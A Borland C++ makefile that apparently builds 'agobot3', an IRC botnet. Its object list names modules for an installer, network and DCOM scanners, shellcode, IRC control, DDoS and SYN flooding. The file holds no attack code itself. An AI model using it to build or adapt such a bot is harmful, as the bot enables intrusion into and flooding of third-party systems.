BORLAND	= D:\Programme\Borland\bcc55
CC		= bcc32
LINK	= ilink32
MAKE	= make
DEFINES	= -DNDEBUG -DWIN32 -D_WINDOWS -D_MBCS -DBCC32
FNAME	= agobot3
FPATH	= bin\win32
ZTHREAD	= lib\ZThread\win32
OPENSSL	= lib\openssl
LIBS	= import32.lib cw32i.lib cw32mt.lib cw32mti.lib ZThread.omf kernel32.lib shell32.lib user32.lib advapi32.lib ws2_32.lib netapi32.lib mpr.lib ssleay32.lib libeay32.lib 
CFLAGS	= -I$(ZTHREAD)\include -I$(OPENSSL)\include $(DEFINES) -I$(BORLAND)\include -VM -w-8002 -w-8026 -w-8057 -w-8012 -w-8004	-O1 -X- -a1 -tW -tWM -q -laa -lTpe -M
LDFLAGS	= /Tpe -L$(ZTHREAD)\lib-bcc -L$(OPENSSL)\lib-bcc -L$(BORLAND)\lib\PSDK -L$(BORLAND)\lib

OBJS = cmdline.obj mainctrl.obj crypter.obj cstring.obj consdbg.obj utility.obj random.obj mac.obj bot.obj commands.obj cvar.obj installer.obj scanner.obj nbscanner.obj dcomscanner.obj shellcode.obj irc.obj locscanner.obj ddos.obj synflood.obj ssllib.obj rsalib.obj
RSAOBJS = rsa\desc.obj rsa\digic.obj rsa\md2c.obj rsa\md5c.obj rsa\nn.obj rsa\prime.obj rsa\r_dh.obj rsa\r_encode.obj rsa\r_enhanc.obj rsa\r_keygen.obj rsa\r_random.obj rsa\r_stdlib.obj rsa\rsa.obj

all: $(OBJS) others link fin

cleanbin: clean $(OBJS) others link fin

others:
#	cd rsa
#	$(MAKE) -fMakefile.bc5
#	cd ..
#	cd getmd5
#	$(MAKE) -fMakefile.bc5
#	cd ..
	cd crypt
	$(MAKE) -fMakefile.bc5
	cd ..

link:
	$(LINK) $(OBJS) $(LDFLAGS) $(LIBS)

clean:
	@del *.obj
	@del md5\*.obj
	@del getmd5\*.obj
	@del crypt\*.obj
	@del bin\win32\*.exe

fin:
	@mkdir -p bin
	@mkdir -p $(FPATH)
	@copy $(FNAME) $(FPATH)

.cpp.obj:
    $(CC) -c $(CFLAGS) $<

.c.obj:
    $(CC) -c $(CFLAGS) $<
